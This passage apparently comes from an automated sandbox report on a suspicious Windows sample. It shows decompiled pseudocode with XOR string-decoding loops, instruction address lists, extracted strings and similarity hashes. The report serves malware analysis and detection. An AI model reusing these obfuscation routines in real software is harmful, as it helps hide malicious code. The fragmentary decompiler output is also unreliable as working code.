													if(_t613 - _t738 + 0xfffffffc > 0x1f) {
														goto L147;
													}
													goto L86;
												}
												_t755 = _v604;
												_t816 = _t818 + 1;
												_t616 = _t755;
												if(_t816 < 0x1000) {
													L81:
													_push(_t816);
													E00412FD5(_t616, _t755);
													_t907 = _t907 + 8;
													goto L82;
												}
												_t755 =  *((intOrPtr*)(_t755 - 4));
												_t816 = _t816 + 0x23;
												if(_t616 <= 0x1f) {
													goto L81;
												}
												L80:
												__imp___invalid_parameter_noinfo_noreturn();
												goto L81;
											}
											_t756 = _v676;
											_t848 = _t817 + 1;
											_t619 = _t756;
											if(_t848 < 0x1000) {
												L76:
												_push(_t848);
												E00412FD5(_t619, _t756);
												_t907 = _t907 + 8;
												goto L77;
											}
											_t755 =  *((intOrPtr*)(_t756 - 4));
											_t816 = _t848 + 0x23;
											_t616 = _t619 - _t755 + 0xfffffffc;
											if(_t619 - _t755 + 0xfffffffc > 0x1f) {
												goto L80;
											}
											goto L76;
										}
										_t272 = _t529 + 1; // 0x10
										_t757 = _t272;
										_t622 = _t880;
										if(_t757 < 0x1000) {
											L72:
											_push(_t757);
											E00412FD5(_t622, _t880);
											_t907 = _t907 + 8;
											goto L73;
										}
										_t880 =  *(_t880 - 4);
										_t755 = _t757 + 0x23;
										_t616 = _t622 - _t880 + 0xfffffffc;
										if(_t622 - _t880 + 0xfffffffc > 0x1f) {
											goto L80;
										}
										goto L72;
									}
									_t855 = _v608;
									_v2480 = _t514;
									if(_t855 < 0x10) {
										goto L43;
									}
									_t764 = _v628;
									_t856 = _t855 + 1;
									_t635 = _t764;
									if(_t856 < 0x1000) {
										L42:
										_push(_t856);
										_t514 = E00412FD5(_t635, _t764);
										_t907 = _t907 + 8;
										goto L43;
									}
									_t755 =  *((intOrPtr*)(_t764 - 4));
									_t816 = _t856 + 0x23;
									_t616 = _t635 - _t755 + 0xfffffffc;
									if(_t635 - _t755 + 0xfffffffc > 0x1f) {
										goto L80;
									}
									goto L42;
								}
								_t765 = _t880;
								_v628 = 0;
								_v612 = 0;
								_t766 =  <  ? _v588 : _t765;
								_push( <  ? _v588 : _t765);
								_t638 =  >=  ? _v604 :  &_v604;
								_v608 = 0xf;
								E0040D1A0(_t668,  &_v628, _t880, _t887,  >=  ? _v604 :  &_v604);
								_v2480 = 5;
								_t641 =  *0x4157cc; // 0x64676679
								_v2488 = _t641;
								_t642 =  *0x4157d0; // 0x361a
								_v2484 = _t642;
								if(_t642 == 0) {
									L36:
									_t643 = E0040DCC0( &_v628,  &_v2488);
									_v2469 = 1;
									if(_t643 != 0) {
										goto L38;
									}
									goto L37;
								}
								_t858 = 0;
								_v2472 = 0;
								do {
									_t861 = _v2472;
									 *(_t896 + _t861 - 0x9ac) =  *(_t896 + _t861 - 0x9ac) ^ _t861 - (0xa0a0a0a1 * _t858 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
									_t858 = _t861 + 1;
									_v2472 = _t858;
								} while (_t858 < 6);
								goto L36;
							}
							_t862 = 0;
							_v2472 = 0;
							if(_t887 < 2) {
								do {
									L31:
									_t865 = _v2472;
									 *(_t896 + _t865 - 0xa10) =  *(_t896 + _t865 - 0xa10) ^ _t865 - (0xa0a0a0a1 * _t862 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
									_t862 = _t865 + 1;
									_v2472 = _t862;
								} while (_t862 < 0x1c);
								goto L32;
							}
							asm("movaps xmm0, [0x415b50]");
							asm("movaps xmm4, [0x415af0]");
							asm("movaps xmm3, [0x415b60]");
							asm("movaps xmm5, [0x415b20]");
							asm("movaps [ebp-0x250], xmm0");
							asm("movd xmm6, edi");
							do {
								asm("movd xmm0, edx");
								asm("pshufd xmm2, xmm0, 0x0");
								asm("paddd xmm2, xmm4");
								asm("movaps xmm1, xmm2");
								asm("movaps xmm0, xmm2");
								asm("punpckldq xmm1, xmm2");
								asm("pmuludq xmm1, xmm3");
								asm("punpckhdq xmm0, xmm2");
								asm("pmuludq xmm0, xmm3");
								asm("shufps xmm1, xmm0, 0xdd");
								asm("psrld xmm1, xmm6");
								asm("pmulld xmm1, xmm5");
								asm("psubd xmm2, xmm1");
								asm("pshuflw xmm0, xmm2, 0xd8");
								asm("pshufhw xmm0, xmm0, 0xd8");
								asm("pshufd xmm1, xmm0, 0xd8");
								asm("pand xmm1, [0x415b40]");
								asm("packuswb xmm1, xmm1");
								asm("movd xmm0, ecx");
								asm("paddb xmm1, xmm0");
								asm("movd xmm0, dword [ebp+edx-0xa10]");
								asm("pxor xmm1, xmm0");
								asm("movd xmm0, eax");
								asm("movd [ebp+edx-0xa10], xmm1");
								asm("pshufd xmm2, xmm0, 0x0");
								asm("paddd xmm2, xmm4");
								asm("movaps xmm1, xmm2");
								asm("movaps xmm0, xmm2");
								asm("punpckldq xmm1, xmm2");
								asm("pmuludq xmm1, xmm3");
								asm("punpckhdq xmm0, xmm2");
								asm("pmuludq xmm0, xmm3");
								asm("shufps xmm1, xmm0, 0xdd");
								asm("psrld xmm1, xmm6");
								asm("pmulld xmm1, xmm5");
								asm("psubd xmm2, xmm1");
								asm("pshuflw xmm0, xmm2, 0xd8");
								asm("pshufhw xmm0, xmm0, 0xd8");
								asm("pshufd xmm1, xmm0, 0xd8");
								asm("pand xmm1, [0x415b40]");
								asm("packuswb xmm1, xmm1");
								asm("movd xmm0, ecx");
								asm("paddb xmm1, xmm0");
								asm("movd xmm0, dword [ebp+edx-0xa0c]");
								asm("pxor xmm1, xmm0");
								asm("movd [ebp+edx-0xa0c], xmm1");
								_t862 = _t862 + 8;
							} while (_t862 < 0x18);
							_v2472 = _t862;
							if(_t862 >= 0x1c) {
								goto L32;
							}
							goto L31;
						}
						_t866 = 0;
						_v2472 = 0;
						if(_t887 < 2) {
							do {
								L25:
								_t869 = _v2472;
								 *(_t896 + _t869 - 0x9c0) =  *(_t896 + _t869 - 0x9c0) ^ _t869 - (0xa0a0a0a1 * _t866 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
								_t866 = _t869 + 1;
								_v2472 = _t866;
							} while (_t866 < 0x14);
							goto L26;
						}
						asm("movaps xmm0, [0x415b50]");
						asm("movaps xmm4, [0x415af0]");
						asm("movaps xmm3, [0x415b60]");
						asm("movaps xmm5, [0x415b20]");
						asm("movaps [ebp-0x250], xmm0");
						asm("movd xmm6, edi");
						asm("o16 nop [eax+eax]");
						do {
							asm("movd xmm0, edx");
							asm("pshufd xmm2, xmm0, 0x0");
							asm("paddd xmm2, xmm4");
							asm("movaps xmm1, xmm2");
							asm("movaps xmm0, xmm2");
							asm("punpckldq xmm1, xmm2");
							asm("pmuludq xmm1, xmm3");
							asm("punpckhdq xmm0, xmm2");
							asm("pmuludq xmm0, xmm3");
							asm("shufps xmm1, xmm0, 0xdd");
							asm("psrld xmm1, xmm6");
							asm("pmulld xmm1, xmm5");
							asm("psubd xmm2, xmm1");
							asm("pshuflw xmm0, xmm2, 0xd8");
							asm("pshufhw xmm0, xmm0, 0xd8");
							asm("pshufd xmm1, xmm0, 0xd8");
							asm("pand xmm1, [0x415b40]");
							asm("packuswb xmm1, xmm1");
							asm("movd xmm0, ecx");
							asm("paddb xmm1, xmm0");
							asm("movd xmm0, dword [ebp+edx-0x9c0]");
							asm("pxor xmm1, xmm0");
							asm("movd xmm0, eax");
							asm("movd [ebp+edx-0x9c0], xmm1");
							asm("pshufd xmm2, xmm0, 0x0");
							asm("paddd xmm2, xmm4");
							asm("movaps xmm1, xmm2");
							asm("movaps xmm0, xmm2");
							asm("punpckldq xmm1, xmm2");
							asm("pmuludq xmm1, xmm3");
							asm("punpckhdq xmm0, xmm2");
							asm("pmuludq xmm0, xmm3");
							asm("shufps xmm1, xmm0, 0xdd");
							asm("psrld xmm1, xmm6");
							asm("pmulld xmm1, xmm5");
							asm("psubd xmm2, xmm1");
							asm("pshuflw xmm0, xmm2, 0xd8");
							asm("pshufhw xmm0, xmm0, 0xd8");
							asm("pshufd xmm1, xmm0, 0xd8");
							asm("pand xmm1, [0x415b40]");
							asm("packuswb xmm1, xmm1");
							asm("movd xmm0, ecx");
							asm("paddb xmm1, xmm0");
							asm("movd xmm0, dword [ebp+edx-0x9bc]");
							asm("pxor xmm1, xmm0");
							asm("movd [ebp+edx-0x9bc], xmm1");
							_t866 = _t866 + 8;
						} while (_t866 < 0x10);
						_v2472 = _t866;
						if(_t866 >= 0x14) {
							goto L26;
						}
						goto L25;
					}
					_t870 = 0;
					_v2472 = 0;
					if(_t887 < 2) {
						do {
							_t873 = _v2472;
							 *(_t896 + _t873 - 0x9f4) =  *(_t896 + _t873 - 0x9f4) ^ _t873 - (0xa0a0a0a1 * _t870 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
							_t870 = _t873 + 1;
							_v2472 = _t870;
						} while (_t870 < 0x10);
						goto L20;
					}
					asm("movaps xmm0, [0x415b50]");
					_t783 = 0;
					asm("movaps xmm4, [0x415af0]");
					asm("movaps xmm3, [0x415b60]");
					asm("movaps xmm5, [0x415b20]");
					asm("movaps [ebp-0x250], xmm0");
					asm("movd xmm6, edi");
					asm("o16 nop [eax+eax]");
					do {
						asm("movd xmm0, ecx");
						asm("pshufd xmm2, xmm0, 0x0");
						asm("paddd xmm2, xmm4");
						asm("movaps xmm1, xmm2");
						asm("movaps xmm0, xmm2");
						asm("punpckldq xmm1, xmm2");
						asm("pmuludq xmm1, xmm3");
						asm("punpckhdq xmm0, xmm2");
						asm("pmuludq xmm0, xmm3");
						asm("shufps xmm1, xmm0, 0xdd");
						asm("psrld xmm1, xmm6");
						asm("pmulld xmm1, xmm5");
						asm("psubd xmm2, xmm1");
						asm("pshuflw xmm0, xmm2, 0xd8");
						asm("pshufhw xmm0, xmm0, 0xd8");
						asm("pshufd xmm1, xmm0, 0xd8");
						asm("pand xmm1, [0x415b40]");
						asm("packuswb xmm1, xmm1");
						asm("movd xmm0, edx");
						asm("paddb xmm1, xmm0");
						asm("movd xmm0, dword [ebp+ecx-0x9f4]");
						asm("pxor xmm1, xmm0");
						asm("movd xmm0, eax");
						asm("movd [ebp+ecx-0x9f4], xmm1");
						asm("pshufd xmm2, xmm0, 0x0");
						asm("paddd xmm2, xmm4");
						asm("movaps xmm1, xmm2");
						asm("movaps xmm0, xmm2");
						asm("punpckldq xmm1, xmm2");
						asm("pmuludq xmm1, xmm3");
						asm("punpckhdq xmm0, xmm2");
						asm("pmuludq xmm0, xmm3");
						asm("shufps xmm1, xmm0, 0xdd");
						asm("psrld xmm1, xmm6");
						asm("pmulld xmm1, xmm5");
						asm("psubd xmm2, xmm1");
						asm("pshuflw xmm0, xmm2, 0xd8");
						asm("pshufhw xmm0, xmm0, 0xd8");
						asm("pshufd xmm1, xmm0, 0xd8");
						asm("pand xmm1, [0x415b40]");
						asm("packuswb xmm1, xmm1");
						asm("movd xmm0, edx");
						asm("paddb xmm1, xmm0");
						asm("movd xmm0, dword [ebp+ecx-0x9f0]");
						asm("pxor xmm1, xmm0");
						asm("movd [ebp+ecx-0x9f0], xmm1");
						_t783 = _t783 + 8;
					} while (_t783 < 0x10);
					goto L20;
				} else {
					_t875 = 0;
					_v2476 = 0;
					if(_t887 >= 2) {
						asm("movaps xmm2, [0x415af0]");
						_t875 = 8;
						asm("movaps xmm4, [0x415b60]");
						asm("movaps xmm1, xmm2");
						asm("punpckldq xmm1, xmm2");
						asm("movaps xmm0, xmm2");
						asm("pmuludq xmm1, xmm4");
						asm("punpckhdq xmm0, xmm2");
						asm("pmuludq xmm0, xmm4");
						asm("movd xmm3, edi");
						_v2476 = 8;
						asm("shufps xmm1, xmm0, 0xdd");
						asm("psrld xmm1, xmm3");
						asm("pmulld xmm1, [0x415b20]");
						asm("psubd xmm2, xmm1");
						asm("pshuflw xmm0, xmm2, 0xd8");
						asm("movaps xmm2, [0x415b10]");
						asm("pshufhw xmm0, xmm0, 0xd8");
						asm("pshufd xmm1, xmm0, 0xd8");
						asm("pand xmm1, [0x415b40]");
						asm("movd xmm0, dword [0x415ae0]");
						asm("packuswb xmm1, xmm1");
						asm("paddb xmm1, [0x415b50]");
						asm("pxor xmm1, xmm0");
						asm("movaps xmm0, xmm2");
						asm("movd [ebp-0x9e4], xmm1");
						asm("movaps xmm1, xmm2");
						asm("punpckldq xmm1, xmm2");
						asm("pmuludq xmm1, xmm4");
						asm("punpckhdq xmm0, xmm2");
						asm("pmuludq xmm0, xmm4");
						asm("shufps xmm1, xmm0, 0xdd");
						asm("psrld xmm1, xmm3");
						asm("pmulld xmm1, [0x415b20]");
						asm("psubd xmm2, xmm1");
						asm("pshuflw xmm0, xmm2, 0xd8");
						asm("pshufhw xmm0, xmm0, 0xd8");
						asm("pshufd xmm1, xmm0, 0xd8");
						asm("pand xmm1, [0x415b40]");
						asm("movd xmm0, dword [ebp-0x9e0]");
						asm("packuswb xmm1, xmm1");
						asm("paddb xmm1, [0x415b50]");
						asm("pxor xmm1, xmm0");
						asm("movd [ebp-0x9e0], xmm1");
					}
					do {
						_t878 = _v2476;
						 *(_t896 + _t878 - 0x9e4) =  *(_t896 + _t878 - 0x9e4) ^ _t878 - (0xa0a0a0a1 * _t875 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
						_t875 = _t878 + 1;
						_v2476 = _t875;
					} while (_t875 < 0xc);
					goto L8;
				}
			}

0x004057a1
0x004057a9
0x004057b0
0x004057b4
0x004057b6
0x004057b8
0x004057c3
0x004057c4
0x004057cb
0x004057d0
0x004057d2
0x004057d7
0x004057db
0x004057e3
0x004057e9
0x004057ef
0x004057f4
0x004057fb
0x00405802
0x00405803
0x00405808
0x0040580e
0x00405811
0x00405818
0x0040581a
0x0040581f
0x00405825
0x00405827
0x00405830
0x0040583d
0x0040584d
0x00405854
0x00405855
0x0040585b
0x00405866
0x00405867
0x00405870
0x0040587b
0x00405880
0x0040588a
0x00405895
0x0040589e
0x004058a3
0x004058a3
0x004058ad
0x004058b2
0x004058ba
0x004058bf
0x004058c5
0x004058cd
0x004058d3
0x00405a02
0x00405a02
0x00405a07
0x00405a09
0x00405a0f
0x00405a14
0x00405a1a
0x00405a20
0x00405a2d
0x00405a3d
0x00405a44
0x00405a45
0x00405a4b
0x00405a5b
0x00405a6a
0x00405a70
0x00405a75
0x00405a80
0x00405a85
0x00405a8b
0x00405a8d
0x00405a94
0x00405a99
0x00405a9f
0x00405aa5
0x00405ab2
0x00405ac2
0x00405ac9
0x00405aca
0x00405ad0
0x00405ad5
0x00405ada
0x00405adc
0x00405ae2
0x00405ae8
0x00405aef
0x00405af4
0x00405afa
0x00405b00
0x00405b0d
0x00405b1d
0x00405b24
0x00405b25
0x00405b2b
0x00405b3c
0x00405b4b
0x00405b51
0x00405b56
0x00405b61
0x00405b66
0x00405b6d
0x00405b74
0x00405b79
0x00405b7f
0x00405cf0
0x00405cfc
0x00405d08
0x00405d0f
0x00405d14
0x00405d1a
0x00405d21
0x00405e94
0x00405ea0
0x00405eac
0x00405eb3
0x00405eb8
0x00405ebe
0x00405ec5
0x00405ecd
0x00405ed5
0x00406044
0x00406050
0x00406055
0x0040605f
0x00406069
0x00406073
0x00406080
0x0040608a
0x0040609c
0x004060a2
0x004060ac
0x004060b6
0x004060c0
0x004060c7
0x004060de
0x004060f4
0x004060ff
0x0040610d
0x004061dc
0x004061dc
0x004061e3
0x004061e3
0x004061eb
0x00406230
0x00406237
0x00406240
0x00406245
0x00406245
0x00406252
0x0040625b
0x00406260
0x00406260
0x00406263
0x0040626d
0x00406277
0x00406281
0x00406288
0x00406290
0x004062a3
0x004062ac
0x004062b9
0x004062be
0x004062c4
0x004062d1
0x00000000
0x00000000
0x004062d7
0x004062dd
0x004062e6
0x00406320
0x00406320
0x00406326
0x00406330
0x00406330
0x00406332
0x00406333
0x00406337
0x0040634c
0x00406351
0x00000000
0x00000000
0x00406357
0x0040635d
0x00406360
0x00406373
0x00406376
0x004063ac
0x004063ac
0x004063ae
0x004063b0
0x00000000
0x00000000
0x00000000
0x004063b0
0x00406378
0x00406378
0x0040637c
0x004063a5
0x004063a5
0x004063a7
0x00000000
0x004063a7
0x00406381
0x00000000
0x00000000
0x00406383
0x00406389
0x00000000
0x00000000
0x0040638e
0x00000000
0x00000000
0x00406390
0x00406396
0x00000000
0x00000000
0x0040639b
0x00000000
0x00000000
0x0040639d
0x004063a3
0x00000000
0x00000000
0x00000000
0x004063a3
0x00406362
0x00406368
0x0040636b
0x0040636e
0x00406371
0x00000000
0x00000000
0x00000000
0x00406371
0x00000000
0x00406362
0x004062e8
0x004062ea
0x004062f0
0x004062fd
0x0040630d
0x00406314
0x00406315
0x0040631b
0x00000000
0x004062f0
0x004063c4
0x004063c9
0x004063d2
0x004063dd
0x004063e8
0x004063fb
0x00406406
0x00406410
0x00406421
0x00406424
0x00406427
0x00406434
0x0040643f
0x0040644b
0x00406451
0x00406455
0x0040645e
0x00406487
0x00406487
0x0040648b
0x00406494
0x004064c1
0x004064c1
0x004064c5
0x004064ce
0x00406501
0x00406507
0x00406513
0x0040651e
0x00406524
0x0040652f
0x0040660d
0x00406617
0x00406621
0x0040662b
0x00406638
0x0040664a
0x00406680
0x00406685
0x00406688
0x00406688
0x00406697
0x004066a6
0x004066b0
0x004066b0
0x004066b4
0x004066be
0x004066cb
0x004066d0
0x004066d2
0x004066df
0x004067e6
0x004067e6
0x004067fa
0x00406802
0x00406803
0x00406808
0x0040680a
0x00406814
0x0040681a
0x00406824
0x0040682e
0x00406831
0x00406840
0x00406840
0x00406843
0x00406846
0x0040685d
0x00406864
0x00406868
0x00406870
0x0040687a
0x00406880
0x0040688b
0x00406890
0x00406896
0x004068a0
0x004068a0
0x004068bc
0x004068c2
0x004068cb
0x004068d1
0x004068f9
0x004068fa
0x00406901
0x00406907
0x0040690e
0x004068d3
0x004068d3
0x004068d9
0x004068e5
0x004068ec
0x004068f2
0x004068f2
0x00406913
0x00406919
0x00406919
0x0040691e
0x00406922
0x0040692b
0x0040695e
0x00406971
0x00406978
0x00406982
0x00406987
0x0040698a
0x0040698e
0x00406997
0x004069ca
0x004069cc
0x004069d6
0x004069e0
0x004069e7
0x004069eb
0x004069f4
0x00406a2d
0x00406a2f
0x00406a39
0x00406a3e
0x00406a3f
0x00406a4c
0x00406a4d
0x00406a57
0x00406a6f
0x00406a77
0x00406a85
0x00406a96
0x00406a99
0x00406a9c
0x00406aa3
0x00406ac0
0x00406ac7
0x00406acc
0x00406ad5
0x00406adc
0x00406af2
0x00406af2
0x00406af8
0x00406b00
0x00406b02
0x00406b03
0x00406b08
0x00406b0b
0x00406b24
0x00406b27
0x00406b34
0x00406b52
0x00406b59
0x00406b65
0x00406b6a
0x00406b73
0x00406baa
0x00406baa
0x00406bb0
0x00406bb2
0x00406bbc
0x00406bc6
0x00406bd0
0x00406c07
0x00406c07
0x00406c10
0x00406c41
0x00406c41
0x00406c44
0x00406c4e
0x00406c58
0x00406c62
0x00406c8c
0x00406c8c
0x00406c8f
0x00406c96
0x00406c9d
0x00406ca4
0x00000000
0x00000000
0x00406ca6
0x00406ca9
0x00406caa
0x00406cb2
0x00000000
0x00000000
0x00406cb4
0x00406cb7
0x00406cc2
0x00000000
0x00000000
0x00000000
0x00406cc2
0x00406c64
0x00406c67
0x00406c68
0x00406c70
0x00406c82
0x00406c82
0x00406c84
0x00406c89
0x00000000
0x00406c89
0x00406c72
0x00406c75
0x00406c7a
0x00406c80
0x00000000
0x00000000
0x00000000
0x00406c80
0x00406c12
0x00406c18
0x00406c19
0x00406c21
0x00406c37
0x00406c37
0x00406c39
0x00406c3e
0x00000000
0x00406c3e
0x00406c23
0x00406c26
0x00406c2b
0x00406c31
0x00000000
0x00000000
0x00000000
0x00406c31
0x00406bd2
0x00406bd8
0x00406bdf
0x00406be7
0x00406bfd
0x00406bfd
0x00406bff
0x00406c04
0x00000000
0x00406c04
0x00406be9
0x00406bec
0x00406bf1
0x00406bf7
0x00000000
0x00000000
0x00000000
0x00406b75
0x00406b75
0x00406b7b
0x00406b82
0x00406b8a
0x00406ba0
0x00406ba0
0x00406ba2
0x00406ba7
0x00000000
0x00406ba7
0x00406b8c
0x00406b8f
0x00406b94
0x00406b9a
0x00406cc4
0x00406cc4
0x00406cca
0x00406cca
0x00406ccc
0x00406cd4
0x00406cd7
0x00406cdf
0x00406ce0
0x00406cf1
0x00406cf1
0x00000000
0x00406b9a
0x00406b73
0x004069f6
0x004069fc
0x00406a03
0x00406a0b
0x00406a23
0x00406a23
0x00406a25
0x00406a2a
0x00000000
0x00406a2a
0x00406a0d
0x00406a10
0x00406a1b
0x00000000
0x00000000
0x00406a1d
0x00406a1d
0x00000000
0x00406a1d
0x00406999
0x0040699f
0x004069a6
0x004069ae
0x004069c0
0x004069c0
0x004069c2
0x004069c7
0x00000000
0x004069c7
0x004069b0
0x004069b3
0x004069b8
0x004069be
0x00000000
0x00000000
0x00000000
0x004069be
0x0040692d
0x00406934
0x00406936
0x0040693e
0x00406954
0x00406954
0x00406956
0x0040695b
0x00000000
0x0040695b
0x00406940
0x00406943
0x00406948
0x0040694e
0x00000000
0x00000000
0x00000000
0x0040694e
0x004066e5
0x004066f1
0x004066f8
0x004066ff
0x00406706
0x0040670a
0x00406710
0x00406710
0x00406717
0x0040671c
0x00406720
0x00406723
0x00406726
0x0040672a
0x0040672e
0x00406732
0x00406736
0x0040673a
0x0040673e
0x00406743
0x00406747
0x0040674c
0x00406751
0x00406756
0x0040675a
0x0040675e
0x00406767
0x0040676b
0x0040676f
0x00406778
0x0040677d
0x00406781
0x00406784
0x00406787
0x0040678b
0x0040678f
0x00406793
0x00406797
0x0040679b
0x0040679f
0x004067a4
0x004067a8
0x004067ad
0x004067b2
0x004067b7
0x004067bb
0x004067bf
0x004067c8
0x004067cc
0x004067d5
0x004067d8
0x004067e4
0x00000000
0x00000000
0x00000000
0x004067e4
0x0040664c
0x00406652
0x00406655
0x00406655
0x00406658
0x0040665b
0x00406672
0x00000000
0x00406672
0x00406535
0x0040653e
0x0040656f
0x0040656f
0x00406572
0x0040657c
0x00406586
0x00406590
0x004065be
0x004065be
0x004065c1
0x004065c8
0x004065cf
0x004065d6
0x00406604
0x00406604
0x00000000
0x00406604
0x004065d8
0x004065db
0x004065dc
0x004065e4
0x004065fa
0x004065fa
0x004065fc
0x00000000
0x00406601
0x004065e6
0x004065e9
0x004065ee
0x004065f4
0x00000000
0x00000000
0x00000000
0x004065f4
0x00406592
0x00406595
0x00406596
0x0040659e
0x004065b4
0x004065b4
0x004065b6
0x004065bb
0x00000000
0x004065bb
0x004065a0
0x004065a3
0x004065a8
0x004065ae
0x00000000
0x00000000
0x00000000
0x004065ae
0x00406540
0x00406546
0x00406547
0x0040654f
0x00406565
0x00406565
0x00406567
0x0040656c
0x00000000
0x0040656c
0x00406551
0x00406554
0x00406559
0x0040655f
0x00000000
0x00000000
0x00000000
0x0040655f
0x004064d0
0x004064d6
0x004064d7
0x004064df
0x004064f7
0x004064f7
0x004064f9
0x004064fe
0x00000000
0x004064fe
0x004064e1
0x004064e4
0x004064ef
0x00000000
0x00000000
0x004064f1
0x004064f1
0x00000000
0x004064f1
0x00406496
0x0040649c
0x0040649d
0x004064a5
0x004064b7
0x004064b7
0x004064b9
0x004064be
0x00000000
0x004064be
0x004064a7
0x004064aa
0x004064af
0x004064b5
0x00000000
0x00000000
0x00000000
0x004064b5
0x00406460
0x00406460
0x00406463
0x0040646b
0x0040647d
0x0040647d
0x0040647f
0x00406484
0x00000000
0x00406484
0x0040646d
0x00406470
0x00406475
0x0040647b
0x00000000
0x00000000
0x00000000
0x0040647b
0x004061ed
0x004061f6
0x004061ff
0x00000000
0x00000000
0x00406201
0x00406207
0x00406208
0x00406210
0x00406226
0x00406226
0x00406228
0x0040622d
0x00000000
0x0040622d
0x00406212
0x00406215
0x0040621a
0x00406220
0x00000000
0x00000000
0x00000000
0x00406220
0x00406113
0x00406115
0x0040612b
0x00406135
0x00406143
0x00406144
0x00406152
0x0040615c
0x00406166
0x0040616c
0x00406171
0x00406177
0x0040617d
0x00406186
0x004061c0
0x004061cc
0x004061d1
0x004061da
0x00000000
0x00000000
0x00000000
0x004061da
0x00406188
0x0040618a
0x00406190
0x0040619d
0x004061ad
0x004061b4
0x004061b5
0x004061bb
0x00000000
0x00406190
0x00405edb
0x00405edd
0x00405ee6
0x00406014
0x00406014
0x00406021
0x00406031
0x00406038
0x00406039
0x0040603f
0x00000000
0x00406014
0x00405eec
0x00405ef3
0x00405efa
0x00405f01
0x00405f08
0x00405f15
0x00405f20
0x00405f20
0x00405f27
0x00405f2c
0x00405f30
0x00405f33
0x00405f36
0x00405f3a
0x00405f3e
0x00405f42
0x00405f46
0x00405f4a
0x00405f4e
0x00405f53
0x00405f57
0x00405f5c
0x00405f61
0x00405f66
0x00405f6e
0x00405f72
0x00405f76
0x00405f7a
0x00405f83
0x00405f87
0x00405f8b
0x00405f94
0x00405f99
0x00405f9d
0x00405fa0
0x00405fa3
0x00405fa7
0x00405fab
0x00405faf
0x00405fb3
0x00405fb7
0x00405fbb
0x00405fc0
0x00405fc4
0x00405fc9
0x00405fce
0x00405fd3
0x00405fdb
0x00405fdf
0x00405fe3
0x00405fe7
0x00405ff0
0x00405ff4
0x00405ffd
0x00406000
0x00406009
0x00406012
0x00000000
0x00000000
0x00000000
0x00406012
0x00405d27
0x00405d29
0x00405d32
0x00405e64
0x00405e64
0x00405e71
0x00405e81
0x00405e88
0x00405e89
0x00405e8f
0x00000000
0x00405e64
0x00405d38
0x00405d3f
0x00405d46
0x00405d4d
0x00405d54
0x00405d61
0x00405d65
0x00405d70
0x00405d70
0x00405d77
0x00405d7c
0x00405d80
0x00405d83
0x00405d86
0x00405d8a
0x00405d8e
0x00405d92
0x00405d96
0x00405d9a
0x00405d9e
0x00405da3
0x00405da7
0x00405dac
0x00405db1
0x00405db6
0x00405dbe
0x00405dc2
0x00405dc6
0x00405dca
0x00405dd3
0x00405dd7
0x00405ddb
0x00405de4
0x00405de9
0x00405ded
0x00405df0
0x00405df3
0x00405df7
0x00405dfb
0x00405dff
0x00405e03
0x00405e07
0x00405e0b
0x00405e10
0x00405e14
0x00405e19
0x00405e1e
0x00405e23
0x00405e2b
0x00405e2f
0x00405e33
0x00405e37
0x00405e40
0x00405e44
0x00405e4d
0x00405e50
0x00405e59
0x00405e62
0x00000000
0x00000000
0x00000000
0x00405e62
0x00405b85
0x00405b87
0x00405b90
0x00405cc0
0x00405ccd
0x00405cdd
0x00405ce4
0x00405ce5
0x00405ceb
0x00000000
0x00405cc0
0x00405b96
0x00405b9d
0x00405b9f
0x00405ba6
0x00405bad
0x00405bb4
0x00405bc1
0x00405bc5
0x00405bd0
0x00405bd0
0x00405bd7
0x00405bdc
0x00405be0
0x00405be3
0x00405be6
0x00405bea
0x00405bee
0x00405bf2
0x00405bf6
0x00405bfa
0x00405bfe
0x00405c03
0x00405c07
0x00405c0c
0x00405c11
0x00405c16
0x00405c1e
0x00405c22
0x00405c26
0x00405c2a
0x00405c33
0x00405c37
0x00405c3b
0x00405c44
0x00405c49
0x00405c4d
0x00405c50
0x00405c53
0x00405c57
0x00405c5b
0x00405c5f
0x00405c63
0x00405c67
0x00405c6b
0x00405c70
0x00405c74
0x00405c79
0x00405c7e
0x00405c83
0x00405c8b
0x00405c8f
0x00405c93
0x00405c97
0x00405ca0
0x00405ca4
0x00405cad
0x00405cb0
0x00000000
0x004058d9
0x004058d9
0x004058db
0x004058e4
0x004058ea
0x004058f1
0x004058f6
0x004058fd
0x00405900
0x00405904
0x00405907
0x0040590b
0x0040590f
0x00405913
0x00405917
0x0040591d
0x00405921
0x00405925
0x0040592e
0x00405932
0x00405937
0x0040593e
0x00405943
0x00405948
0x00405950
0x00405958
0x0040595c
0x00405964
0x00405968
0x0040596b
0x00405973
0x00405976
0x0040597a
0x0040597e
0x00405982
0x00405986
0x0040598a
0x0040598e
0x00405997
0x0040599b
0x004059a0
0x004059a5
0x004059aa
0x004059b2
0x004059ba
0x004059be
0x004059c6
0x004059ca
0x004059ca
0x004059d2
0x004059df
0x004059ef
0x004059f6
0x004059f7
0x004059fd
0x00000000
0x004059d2

APIs

_printf.MSPDB140-MSVCRT ref: 0040589E

Strings

71<, xrefs: 004058BA
<83, xrefs: 00405A85
Error: %d, xrefs: 00405899, 0040623B, 00406256, 0040667B

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: _printf
String ID: 71<$<83$Error: %d
API String ID: 723836530-305793445
Opcode ID: 41816850a7f3c810152b0aa08486497c6d82e1f935224481f17c92a6e75865a4
Instruction ID: 030c9bd85acde10aec1662a57c0168366ef91c3709ba03c01e6bf66156ba2b37
Opcode Fuzzy Hash: 41816850a7f3c810152b0aa08486497c6d82e1f935224481f17c92a6e75865a4
Instruction Fuzzy Hash: 7CC2F471D112588BEB16CB38CC457D9B7B4AF96344F10C3EAE809766A2E7346AC5CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00408826 Relevance: 14.0, APIs: 3, Strings: 4, Instructions: 1707COMMON

Download Yara Rule

APIs

_printf.MSPDB140-MSVCRT ref: 00408A41

Strings

71<, xrefs: 00408A58
YA, xrefs: 0040955F
<83, xrefs: 00408C32
Error: %d, xrefs: 00408A3C, 00409398, 004093B0

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

